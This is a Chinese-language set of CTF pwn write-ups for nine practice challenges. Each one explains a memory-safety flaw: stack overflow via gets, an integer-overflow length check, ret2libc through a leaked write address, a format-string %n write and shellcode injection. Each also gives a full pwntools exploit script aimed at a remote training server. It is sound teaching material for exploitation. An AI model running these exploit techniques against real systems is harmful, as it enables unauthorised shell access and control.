1.guess_num
用checksec查看文件属性:
用64位的IDA打开:
因为gets()函数不受输入限制可能会覆写掉栈中的返回地址,造成缓冲区溢出,因此在这利用gets函数
进入main函数的栈空间:
可见var_30(也就是v7)占0x30个字节,并且当var_30溢出时可覆盖seed。
关于随机数的产生:http://c.biancheng.net/view/2043.html
在这里我们需要知道,rand()函数根据种子即seed产生随机数,当种子相同时,获得的随机数也相同。对于该题目,我们将随机种子设置为0或1都可,参考文件中的循环来写脚本。
关于ldd命令:https://www.cnblogs.com/wanghetao/p/3779611.html
ldd命令用于判断某个可执行的 binary 档案含有什么动态函式库,本题使用方法:
ldd guess_num
关于ctypes:https://blog.csdn.net/mfq1219/article/details/81945448
ctypes是Python的一个外部库,提供和C语言兼容的数据类型,可以很方便地调用DLL中输出的C接口函数
加载dll和取出函数:
from ctypes import *
dll = cdll.LoadLibrary(dllpath) #dllpath是字符串
exp:
from pwn import *
from ctypes import *
payload = 'a' * 0x20 + p64(1)
io = remote('111.198.29.45',57873)
libc = cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")
io.recvuntil('Your name:')
io.sendline(playload)
libc.srand(1)
for i in range(10):
num = str(libc.rand()%6 + 1)
io.recvuntil('number:')
io.sendline(num)
io.interactive()
参考:https://www.jianshu.com/p/0bc6c65addfd
2.int_overflow
用checksec查看文件属性:
没有开启Canary(栈保护),可以利用栈溢出漏洞
用32位的IDA打开,F5查看源码:
进入主函数
通过代码,容易分析出程序执行过程,再进入login()函数
可见通过read()函数可输入一个长度为0x199的buf(即password),再进入check_passwd()函数
此时定义了一个无符号的整型v3来存储password的长度,v3为一个字节,即8bit。但0x199的二进制位数明显超过了8位,故在这里可能存在整数溢出
关于整数溢出:整型变量有规定的有效数据长度,当它的数据长度超过其有效数据长度时,超过的部分就产生溢出,溢出的部分则直接忽略。
常见各类整型占用字节数及取值范围:
C语言中各个数据类型所能表示的数都是有一定的取值范围的,一旦要表示的数超出了该数据类型的取值范围,就会从起点开始重新计数
在本题中,程序规定输入的password长度必须在3~8之间,否者视为无效输入。但由整型溢出原理可知,我们输入的password长度如果在259~264之间也可通过if语句,因为:
超过8位的数据将被忽略,即将259赋值给v3时,v3的值为3
通过if语句之后,会将password拷贝给dest,进入dest的栈空间
dest的大小为0x14,当password的大小超过0x14后皆可覆盖后面的ebp和返回地址,又发现Functions Window里一个特殊的函数
所以可将strcpy()的返回地址覆盖为what_is_this()函数的返回地址,即可得到flag
这里我们password的长度就选取262(259~264之间任意一个数都可以)
dest的长度为0x14,ebp占4个字节,what_is_this()函数的返回地址占四个字节,故剩余字节数为:262-0x14-4-4=234
exp
from pwn import *
elf = ELF('./int_overflow')
io = remote('111.198.29.45',48464)
#io.recvuntil("Your choice:")
#io.sendline("1")
io.sendlineafter("Your choice:","1")
io.sendlineafter("username:","yh")
cat_flag_addr = elf.symbols['what_is_this']
#cat_flag_addr = 0x08048694
payload = 'a' * 0x14 + 'aaaa' + p32(cat_flag_addr) + 234 * 'a'
io.sendlineafter("passwd:",payload)
io.interactive()
参考:
http://www.sohu.com/a/340938352_120054144
https://www.52pojie.cn/thread-1032448-1-1.html
3.when_did_you_born
用checksec查看文件属性:
开启了Canary,则无法用覆盖返回地址的方法了
用64位的IDA打开
程序要求我们分别输入生日和姓名,并且生日不能为1926,但在我们输入姓名之后,如果生日为1926才会输出flag,这就与前面的要求矛盾了
进入main()函数的栈空间看一看
可见我们可以通过var_20数据的溢出来覆盖var_18的值,这样我们输入名字的时候就可以重新修改生日为1926,通过下面的if语句输出flag了。由栈空间变量的分布可知var_20占8个字节,超过这个长度即可以覆盖var_18的值了
并且在名字输入时,采用的函数为gets(),可以进行溢出
注:gets()不检查字符串string的大小,必须遇到换行符或文件结尾才会结束输入,因此容易造成缓存溢出的安全性问题,导致程序崩溃,可以使用fgets()代替。
exp:
from pwn import *
io = remote("111.198.29.45",46596)
io.recvuntil("What's Your Birth?")
io.sendline("2000.1.1")
io.recvuntil("What's Your Name?")
payload = 'a' * 8 + p64(1926)
io.sendline(payload)
io.interactive()
4.cgpwn2
用checksec查看文件属性:
运行一下:
使用32位的IDA打开,F5反汇编结果如下:
进入hello()函数,前面一大段代码似乎没有什么作用,看最后几句:
gets()函数可能造成溢出,并且查看到这个程序有system函数
则可以利用gets函数溢出覆盖修改返回地址为system函数的地址,但是这个system还缺参数"/bin/sh",因此需要我们自己传入这个参数
双击这里的name进入IDA View-A窗口,可以发现name是储存在bbs段中的全局变量,那我就可以将"/bin/sh"写入name中,将name的地址作为system的参数传入
进入hello函数栈空间,可发现s占26个字节,则还需4个字节覆盖ebp
构造的覆盖数据组成为:变量s所占字节+ebp+system函数地址+system函数返回地址+"/bin/sh"参数地址
exp:
from pwn import *
io = remote("111.198.29.45",56568)
#io = process("./cgpwn2")
elf = ELF('./cgpwn2')
bin_sh_addr = 0x0804A080
sys_addr = elf.symbols['system']
io.recvuntil("your name")
io.sendline("/bin/sh")
io.recvuntil("here:")
payload = 'a' * (0x26 + 0x4) + p32(sys_addr) + 'a' * 4 + p32(bin_sh_addr)
io.sendline(payload)
io.interactive()
5.hello_pwn
用checksec查看文件属性并运行一下:
再使用64位的IDA打开,F5反汇编查看伪代码
进入if语句里的函数看看:
可见,只要dword_60106C == 1853186401这个条件成立,即可得到flag
进入IDA View-A 发现dword_60106C与unk_601068相隔4个字节,则构造这样的unk_601068:'a'*4+1853186401,即可将dword_60106C覆盖为1853186401
exp:
from pwn import *
r = remote('111.198.29.45',49875)
playload = 'a'*4 + p64(1853186401)
r.recvuntil("lets get helloworld for bof")
r.sendline(playload)
r.interactive()
6.leve2
用checksec查看文件属性并运行一下:
使用32位的IDA打开,F5反汇编main函数:
进入vnlnerable_function()看看:
再使用Shift+F12查看字符串窗口,也看见"/bin/sh",解题思路如下:
通过read()函数读入数据,构造一个system("/bin/sh")的伪栈帧,vulnerable_function()执行结束后返回到我们构造的伪栈帧去执行system("bin/sh"),这样就可以获取shell。
exp:
from pwn import *
context.log_level = "debug"
elf = ELF('./level2')
sys_addr = elf.symbols['system']
sh_addr = elf.search('/bin/sh').next()
playload = 'a' * (0x88 + 0x4) + p32(sys_addr) + p32(0)+ p32(sh_addr)
io = remote('111.198.29.45',35505)
io.sendline(playload)
io.interactive()
7.leve3
用checksec查看文件属性并运行一下:
用32位的IDA打开,F5反汇编main()函数查看伪代码
进入vnlnerable_function()函数中
存在read()函数,可以进行溢出,但是查看函数窗口和字符串窗口,既无system函数也无/bin/sh字符串
但是存在可以溢出的read函数与write()函数,可以用来泄露出system函数与/bin/sh字符串的地址
关于write()函数:
因为libc中的函数的相对地址是固定的,并且在知道libc的版本后各个函数在其中的相对位置就可以得到。
则需要泄露出write()函数的相对地址再减去write()函数在libc中的偏移量即可得到libc的基地址,得到了libc的基地址,再加上system()函数和"/bin/sh"字符串在libc中的偏移量即可得到它们在的相对位置(在程序中调用使用的是相对位置)
关于GOT表和PLT表:https://www.jianshu.com/p/f9189b8bf183
exp
1.利用LibcSearcher
#-*-coding:utf-8-*-
from pwn import *
from LibcSearcher import LibcSearcher
import pwnlib
context.terminal = ['gnome-terminal','-x','sh','-c']
sh = remote('111.198.29.45',53647)
elf = ELF('./level3')
write_plt = elf.plt['write'] #获取plt表中write的地址
write_got = elf.got['write'] #获取got表中write的地址
vuln = 0x0804844B
print "write_plt = ",hex(write_plt) #分别将plt表中write的地址和vnlnerable()函数的地址打印出来
print "vuln = ",hex(vuln)
print "leak write_addr and return to vnlnerable function again"
payload = ''
payload += 140 * 'a' #覆盖read中的buf和ebp
payload += p32(write_plt) #plt表中write的地址填入read()函数的返回地址
payload += p32(vuln) #将vnlnerable()函数的地址作为write()函数的返回地址
payload += p32(1) + p32(write_got) + p32(4) #作为write函数的参数,用于泄露write函数的地址
sh.sendlineafter(':\n',payload)
print "get the related address"
write_addr = u32(sh.recv(4))
print "write_addr = ",hex(write_addr)
libc = LibcSearcher('write',write_addr) #根据泄露的地址,寻找到对应的libc版本
libcbase = write_addr - libc.dump('write') #用write函数的相对地址减去在libc中对应的偏移量得到libc的基地址
system_addr = libcbase + libc.dump('system') #用system函数在libc中的偏移量加上libc的基地址得到system函数的地址
binsh_addr = libcbase + libc.dump('str_bin_sh')
print "libcbase = ",hex(libcbase)
print "system_addr = ",hex(system_addr)
print "binsh_addr = ",hex(binsh_addr)
payload = ''
payload += 'a' * 140
payload += p32(system_addr)
payload += p32(0xdeadbeef)
payload += p32(binsh_addr)
sh.sendline(payload)
sh.interactive()
2.直接使用题目给出的libc版本
#-*-coding:utf-8-*-
from pwn import *
sh = remote('111.198.29.45',53647)
elf = ELF('./level3')
libc = ELF('./libc_32.so.6')
write_plt = elf.plt['write']
write_got = elf.got['write']
vuln_addr = elf.symbols['vulnerable_function']
payload = 'a' * 140 + p32(write_plt) + p32(vuln_addr) + p32(1) + p32(write_got) + p32(4)
sh.sendlineafter("Input:\n",payload)
write_got_addr = u32(sh.recv(4))
print 'write_got address is ',hex(write_got_addr)
libc_addr = write_got_addr - libc.symbols['write']
print 'libc_addr is ',hex(libc_addr)
system_addr = libc_addr + libc.symbols['system']
print 'system address is ',hex(system_addr)
binsh_addr = libc_addr + 0x15902B #0x15902b是"/bin/sh"在libc中的地址
# hex(libc.search("/bin/sh").next()) = 0x15902B
print '/bin/sh address is ',hex(binsh_addr)
payload = 'a' * 140 + p32(system_addr) + p32(0xdeadbeef) + p32(binsh_addr)
sh.sendline(payload)
sh.interactive()
参考:https://www.52pojie.cn/thread-1032651-1-1.html
8.CGfsb
用checksec查看文件属性并运行一下:
使用32位IDA打开,点击main()函数F5查看伪代码:
可以发现如果pwnme=8,则可得到flag,双击pwnme,进入IDA View-A
发现pwnme是储存在bbs段的全局变量,地址为:0804A068。并且该程序没有开启PIE保护,则pwnme的地址不会发生改变
PIE:全称是position-independent executable,中文解释为地址无关可执行文件,该技术是一个针对代码段(.text)、数据段(.data)、未初始化全局变量段(.bss)等固定地址的一个防护技术,如果程序开启了PIE保护的话,在每次加载程序时都变换加载地址,从而不能通过ROPgadget等一些工具来帮助解题
箭头处存在字符串格式化漏洞,可以利用这个来修改pwnme的值
可以发现s在栈中的偏移量位10
exp
from pwn import *
sh = remote('111.198.29.45',44004)
pwnme_addr = 0x0804A068
sh.sendlineafter('name:','yh')
payload = p32(pwnme_addr) + 'aaaa%10$n' #p32(pwnme)占4字节,因此还需要4字节,才能满足8个字节
sh.sendlineafter('please:',payload)
sh.interactive()
几点补充的知识:
①%x是输出16进制数据,08表示宽度为8,不足8为左边按0补齐
②%n:将%n之前printf已经打印的字符个数赋值给偏移处指针所指向的地址位置
③%K$n:其中的K表示对第几个参数进行相应操作
9.string
shellcode的生成方法:
https://blog.csdn.net/qq_35495684/article/details/79583232
exp:
#encoding=utf-8
from pwn import *
context(arch = 'amd64', os = 'linux') #指明环境,为生成shellcode做准备
p = remote('111.198.29.45',32405)
p.recvuntil('secret[0] is ')
v3_addr=int(p.recv(7),16) #提取v4的地址,并且转化为16进制
#v3_addr=int(p.recvuntil('/n')[:-1],16) [:-1]用于去除末尾的/n
p.sendlineafter("What should your character's name be:","asd")
p.sendlineafter("So, where you will go?east or up?:","east")
p.sendlineafter("go into there(1), or leave(0)?:","1")
p.sendlineafter("'Give me an address'",str(v3_addr))
payload = "%85c%7$n" #format的偏移量为8,v2在format前面一位,因此偏移量为7
p.sendlineafter("And, you wish is:",payload)
shellcode = asm(shellcraft.sh())
p.sendlineafter('Wizard: I will help you! USE YOU SPELL',shellcode)
p.interactive()